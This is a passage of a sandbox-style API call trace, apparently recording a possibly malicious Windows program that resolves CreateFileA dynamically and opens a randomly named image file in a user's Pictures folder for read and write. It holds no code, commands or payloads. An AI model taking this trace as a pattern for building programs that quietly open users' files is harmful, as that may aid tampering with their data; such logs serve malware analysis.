HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0040.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0040.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0040.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0040.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.626] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0040.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.628] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0040.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cc10 [0040.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cc10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0040.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.628] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0040.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc10 [0040.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cc10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0040.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.629] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0040.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0040.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0040.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0040.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0040.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp", cchWideChar=56, lpMultiByteStr=0x7c2080, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp", lpUsedDefaultChar=0x0) returned 56 [0040.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0040.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.631] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\d_o37vi.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0040.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=56, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0040.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0040.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=56, lpWideCharStr=0x7db378, cchWideChar=56 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp") returned 56 [0040.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0040.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0040.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0040.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0040.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0040.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0040.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.633] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.633] HeapFree (in: 